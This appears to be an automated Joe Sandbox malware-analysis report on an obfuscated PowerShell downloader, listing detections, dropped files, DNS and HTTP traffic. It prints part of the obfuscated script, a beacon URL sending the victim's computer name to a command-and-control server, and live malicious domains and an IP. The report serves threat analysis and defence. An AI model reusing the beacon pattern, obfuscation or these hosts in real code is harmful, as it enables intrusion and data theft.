VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps15%ReversingLabsWin32.Trojan.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.64.100
truefalse
    high
    gajaechkfhfghal.top
    45.61.136.138
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
        high
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://gajaechkfhfghal.toppowershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2F96C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmpfalse
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://go.micropowershell.exe, 00000000.00000002.19683260823.0000012D308E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGpowershell.exe, 00000000.00000002.19683260823.0000012D3046F000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Licensepowershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php?powershell.exe, 00000000.00000002.19683260823.0000012D2FF8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/recaptcha/api.jspowershell.exe, 00000000.00000002.19683260823.0000012D3047C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30482000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.google.compowershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D3046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.quovadis.bm0powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/Pester/PesterXzpowershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.19683260823.0000012D2F041000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crl.micrpowershell.exe, 00000000.00000002.19711229210.0000012D471D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.19683260823.0000012D2F041000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php?id=$env:computername&key=$dhvyekza&s=527powershell.exe, 00000000.00000002.19683260823.0000012D305E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                45.61.136.138
                                                                gajaechkfhfghal.topUnited States
                                                                40676AS40676USfalse
                                                                142.250.64.100
                                                                www.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1579870
                                                                Start date and time:2024-12-23 13:21:10 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 5m 30s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                Run name:Suspected VM Detection
                                                                Number of analysed new started processes analysed:4
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:download.ps1
                                                                Detection:MAL
                                                                Classification:mal56.evad.winPS1@2/7@2/2
                                                                EGA Information:Failed
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 14
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .ps1
                                                                • Stop behavior analysis, all processes terminated
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                                                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 2668 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • VT rate limit hit for: download.ps1
                                                                TimeTypeDescription
                                                                07:23:18API Interceptor23x Sleep call for process: powershell.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                • gajaechkfhfghal.top/kqubowg9xhhtr.php?id=computer&key=39968631184&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • gajaechkfhfghal.top/q9lpw6berahtr.php?id=user-PC&key=70313677457&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/cbym9z28drhtr.php?id=user-PC&key=95448541662&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                gajaechkfhfghal.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                • 107.176.168.244
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                • 45.61.136.138
                                                                No context
                                                                No context
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:@...e...........................................................
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7544337353339574
                                                                Encrypted:false
                                                                SSDEEP:96:OzhN/CdGc4kvhkvCCtSeuEnk5sHleuEnk9+sHu:Ot9TruEk1uEk9e
                                                                MD5:B5703952F0FCBE3C9D2A98081208EBD9
                                                                SHA1:5FF08CAF047292EFFB05F4527E597CCE369C2861
                                                                SHA-256:081B7182DCC9A856AE709BC90D177E5017FFBD15F9917214C45FBDECD3CC44E0
                                                                SHA-512:ABC7AF61E216E4FC4DB578FE0257D9BB7CD015A9C0ED6D34EED6C569D63D02B8E8DF19123676C42935A7BE89B5C807F59D21D4595EA68A47F3454A9E44B10D4E
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...;.}.S...O..q5U..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S......k5U.....q5U......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y.b....B......................A!.A.p.p.D.a.t.a...B.V.1......Y.b..Roaming.@......"S.Y.b....D.....................$...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y.b....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y.2..Windows.@......"S.Y.b....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y./....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y./....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Y].....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y.b....i...........
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7544337353339574
                                                                Encrypted:false
                                                                SSDEEP:96:OzhN/CdGc4kvhkvCCtSeuEnk5sHleuEnk9+sHu:Ot9TruEk1uEk9e
                                                                MD5:B5703952F0FCBE3C9D2A98081208EBD9
                                                                SHA1:5FF08CAF047292EFFB05F4527E597CCE369C2861
                                                                SHA-256:081B7182DCC9A856AE709BC90D177E5017FFBD15F9917214C45FBDECD3CC44E0
                                                                SHA-512:ABC7AF61E216E4FC4DB578FE0257D9BB7CD015A9C0ED6D34EED6C569D63D02B8E8DF19123676C42935A7BE89B5C807F59D21D4595EA68A47F3454A9E44B10D4E
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...;.}.S...O..q5U..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S......k5U.....q5U......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y.b....B......................A!.A.p.p.D.a.t.a...B.V.1......Y.b..Roaming.@......"S.Y.b....D.....................$...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y.b....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y.2..Windows.@......"S.Y.b....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y./....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y./....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Y].....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y.b....i...........
                                                                File type:ASCII text, with very long lines (10697), with CRLF line terminators
                                                                Entropy (8bit):6.005992831097856
                                                                TrID:
                                                                  File name:download.ps1
                                                                  File size:18'916 bytes
                                                                  MD5:6dc27c0ae6c260bbed7a9b00e3306263
                                                                  SHA1:66d59a64b88b605d7fe887b4bcf7c9ea298fbb57
                                                                  SHA256:fca7d47c39e4e5b1e375ff7497d67cfbd2bb4d2fa937c617f5a6b5c3c71ccb21
                                                                  SHA512:11f4dcc0a45569b1e9a2a070945d9cb498d9eeb31550f405e0ac215b189ce2d5bb9d5d88cf2a6a1836418dcfd2e1e600a8e55a67ec2aaff555e2112310a8649f
                                                                  SSDEEP:384:4pLgpYa4i8Kg9AIL/ncToT6wAs1Ix9w62G7P1jWZLdtjMd7G8j0:4MNRUAOcToT61sG9UG7P1jIxtj1T
                                                                  TLSH:C8827C60334CE4F5D18AC9A3AD56BC083B21785BC1D7A9D0B7BCC5C67B899859F8CC02
                                                                  File Content Preview:$nzdxguep=$executioncontext;$ininenoratreinisonalreen = -join (0..54 | ForEach-Object {[char]([int]"00000098000000970000010200000095000001010000009900000101000001000000010000000095000001010000009300000094000001000000009700000101000000990000010100000101000
                                                                  Icon Hash:3270d6baae77db44
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 23, 2024 13:23:20.824507952 CET4975380192.168.11.2045.61.136.138
                                                                  Dec 23, 2024 13:23:20.985574961 CET804975345.61.136.138192.168.11.20
                                                                  Dec 23, 2024 13:23:20.985924006 CET4975380192.168.11.2045.61.136.138
                                                                  Dec 23, 2024 13:23:20.988513947 CET4975380192.168.11.2045.61.136.138
                                                                  Dec 23, 2024 13:23:21.149554014 CET804975345.61.136.138192.168.11.20
                                                                  Dec 23, 2024 13:23:21.177980900 CET804975345.61.136.138192.168.11.20
                                                                  Dec 23, 2024 13:23:21.230735064 CET4975380192.168.11.2045.61.136.138
                                                                  Dec 23, 2024 13:23:21.276278973 CET4975480192.168.11.20142.250.64.100
                                                                  Dec 23, 2024 13:23:21.370769024 CET8049754142.250.64.100192.168.11.20
                                                                  Dec 23, 2024 13:23:21.371011019 CET4975480192.168.11.20142.250.64.100
                                                                  Dec 23, 2024 13:23:21.371114969 CET4975480192.168.11.20142.250.64.100
                                                                  Dec 23, 2024 13:23:21.465811968 CET8049754142.250.64.100192.168.11.20
                                                                  Dec 23, 2024 13:23:21.850532055 CET8049754142.250.64.100192.168.11.20
                                                                  Dec 23, 2024 13:23:21.850773096 CET8049754142.250.64.100192.168.11.20
                                                                  Dec 23, 2024 13:23:21.851108074 CET4975480192.168.11.20142.250.64.100
                                                                  Dec 23, 2024 13:23:21.852533102 CET4975480192.168.11.20142.250.64.100
                                                                  Dec 23, 2024 13:23:21.946647882 CET8049754142.250.64.100192.168.11.20
                                                                  Dec 23, 2024 13:23:21.954282045 CET8049754142.250.64.100192.168.11.20
                                                                  Dec 23, 2024 13:23:21.954557896 CET8049754142.250.64.100192.168.11.20
                                                                  Dec 23, 2024 13:23:21.954567909 CET8049754142.250.64.100192.168.11.20
                                                                  Dec 23, 2024 13:23:21.954714060 CET4975480192.168.11.20142.250.64.100
                                                                  Dec 23, 2024 13:23:22.056993961 CET4975380192.168.11.2045.61.136.138
                                                                  Dec 23, 2024 13:23:22.057593107 CET4975480192.168.11.20142.250.64.100
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 23, 2024 13:23:20.710971117 CET6461553192.168.11.201.1.1.1
                                                                  Dec 23, 2024 13:23:20.817496061 CET53646151.1.1.1192.168.11.20
                                                                  Dec 23, 2024 13:23:21.179488897 CET5970453192.168.11.201.1.1.1
                                                                  Dec 23, 2024 13:23:21.275252104 CET53597041.1.1.1192.168.11.20
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 23, 2024 13:23:20.710971117 CET192.168.11.201.1.1.10x9107Standard query (0)gajaechkfhfghal.topA (IP address)IN (0x0001)false
                                                                  Dec 23, 2024 13:23:21.179488897 CET192.168.11.201.1.1.10x3905Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 23, 2024 13:23:20.817496061 CET1.1.1.1192.168.11.200x9107No error (0)gajaechkfhfghal.top45.61.136.138A (IP address)IN (0x0001)false
                                                                  Dec 23, 2024 13:23:21.275252104 CET1.1.1.1192.168.11.200x3905No error (0)www.google.com142.250.64.100A (IP address)IN (0x0001)false
                                                                  • gajaechkfhfghal.top
                                                                  • www.google.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.11.204975345.61.136.138802668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 23, 2024 13:23:20.988513947 CET215OUTGET /hxe035pvfthtr.php?id=computer&key=72113948934&s=527 HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: gajaechkfhfghal.top
                                                                  Connection: Keep-Alive
                                                                  Dec 23, 2024 13:23:21.177980900 CET166INHTTP/1.1 302 Found
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Mon, 23 Dec 2024 12:23:21 GMT
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Location: http://www.google.com


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.11.2049754142.250.64.100802668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 23, 2024 13:23:21.371114969 CET159OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: www.google.com
                                                                  Connection: Keep-Alive
                                                                  Dec 23, 2024 13:23:21.850532055 CET1289INHTTP/1.1 302 Found
                                                                  Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                  x-hallmonitor-challenge: CgwIuayluwYQ9vee_AISBL9g48w
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-w_bSVLdjQlJr2BeFBpJYiQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                  Date: Mon, 23 Dec 2024 12:23:21 GMT
                                                                  Server: gws
                                                                  Content-Length: 396
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Set-Cookie: AEC=AZ6Zc-Wgfipmk0pPJMDo0N78S0B04DB7vFK6M3Im0v_hlrhomVf7mKvH4Tw; expires=Sat, 21-Jun-2025 12:23:21 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                  Set-Cookie: NID=520=d35BnNjBn9lHyRyhcXI14E66uAwGvq18XUwHjerGxFuNTfLtsWmjtFbfRwypj2bSbZ9RlpMTupjEwY5UwFGMceytw9HGj6d2WYCAPsog_yQagaD2LroYRzyJYubdZH1CPtVLRAZ7gcTyIqllglQdRtJTHBox9xMpU5ylIFEutZV7Kgj9Ek5kGQiq22D2eMqdPddc2w; expires=Tue, 24-Jun-2025 12:23:21 GMT; path=/; domain=.google.com; HttpOnly
                                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/
                                                                  Dec 23, 2024 13:23:21.850773096 CET338INData Raw: 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20
                                                                  Data Ascii: html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://www.google.com/sorry/index?continue=http://www.google.com/&amp;q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92
                                                                  Dec 23, 2024 13:23:21.852533102 CET524OUTGET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                  Host: www.google.com
                                                                  Cookie: NID=520=d35BnNjBn9lHyRyhcXI14E66uAwGvq18XUwHjerGxFuNTfLtsWmjtFbfRwypj2bSbZ9RlpMTupjEwY5UwFGMceytw9HGj6d2WYCAPsog_yQagaD2LroYRzyJYubdZH1CPtVLRAZ7gcTyIqllglQdRtJTHBox9xMpU5ylIFEutZV7Kgj9Ek5kGQiq22D2eMqdPddc2w
                                                                  Dec 23, 2024 13:23:21.954282045 CET1289INHTTP/1.1 429 Too Many Requests
                                                                  Date: Mon, 23 Dec 2024 12:23:21 GMT
                                                                  Pragma: no-cache
                                                                  Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Content-Type: text/html
                                                                  Server: HTTP server (unknown)
                                                                  Content-Length: 3075
